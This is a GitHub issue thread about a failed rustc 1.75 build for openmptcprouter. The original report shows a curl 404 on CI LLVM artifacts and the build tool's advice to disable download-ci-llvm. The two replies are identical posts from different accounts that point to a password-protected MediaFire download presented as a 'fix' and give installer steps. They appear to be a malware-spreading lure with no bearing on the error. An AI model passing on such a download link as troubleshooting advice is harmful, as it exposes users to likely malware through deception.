Ysurac/openmptcprouter #3506: When compiling r5s version online, I found this problem. How can I solve it

18750319950, 2024-08-27:
Building bootstrap
    Finished dev [unoptimized] target(s) in 0.94s
downloading https://ci-artifacts.rust-lang.org/rustc-builds/82e1608dfa6e0b5569232559e3d385fea5a93112/rust-dev-1.75.0-x86_64-unknown-linux-gnu.tar.xz
#=#=-  #       #                                                                                                                                                                                                                                               #=O=#     #        #                                                                                                                                                                                                                                           
curl: (22) The requested URL returned error: 404 
ERROR: failed to download llvm from ci

    HELP: old builds get deleted after a certain time
    HELP: if trying to compile an old commit of rustc, disable `download-ci-llvm` in config.toml:

    [llvm]
    download-ci-llvm = false
    
Build completed unsuccessfully in 0:00:03
make[3]: *** [Makefile:110: /root/openmptcprouter/r5s/6.1/source/build_dir/target-aarch64_generic_musl/host/rustc-1.75.0-src/.built] Error 1
make[3]: Leaving directory '/root/openmptcprouter/feeds/openmptcprouter/rust'

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

closed 2024-12-01 by github-actions[bot]